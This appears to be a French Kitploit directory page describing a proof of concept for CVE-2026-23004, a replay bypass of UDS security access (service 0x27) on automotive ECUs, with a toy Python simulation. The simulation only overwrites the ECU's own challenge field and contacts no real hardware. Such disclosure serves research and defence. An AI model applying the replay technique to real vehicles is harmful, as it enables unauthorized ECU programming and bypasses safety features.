Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — Exploit de preuve de concept démontrant le contournement de l'authentification UDS via le rejeu de type défi-réponse sur des calculateurs automobiles (ECU), avec un simulateur CAN-UDS en Python. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Authentification et AutorisationSécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Matériel et IoT
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

Exploit de preuve de concept démontrant le contournement de l'authentification UDS via le rejeu de type défi-réponse sur des calculateurs automobiles (ECU), avec un simulateur CAN-UDS en Python.

Voir le dépôt
1il y a 15 joursPas encore vérifié
Partager

CVE-2026-23004 – Contournement de l'authentification UDS automobile par attaque de rejeu

Code du programme (simulation Python CAN‑UDS)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – Contournement de l'authentification UDS automobile par rejeu

Severity: High

Vue d'ensemble

Un calculateur automobile (ECU) implémente l'accès sécurisé Unified Diagnostic Services (UDS) (service 0x27) mais n'impose pas l'utilisation unique du challenge. Un attaquant peut capturer une paire challenge‑réponse valide et la rejouer pour contourner l'authentification.

Détails de la vulnérabilité

  • Type : Attaque par rejeu
  • Impact : Programmation non autorisée de l'ECU, contournement des dispositifs de sécurité.
  • Cause racine : L'ECU accepte toute réponse correspondant au challenge en cours, mais le même challenge peut être réutilisé sans être invalidé.

Démonstration de l'exploit

Exécutez la simulation :

root@kitploit:~
python uds_sim.py

L'ECU se déverrouille deux fois avec la même paire d'authentification.

Télécharger l’outil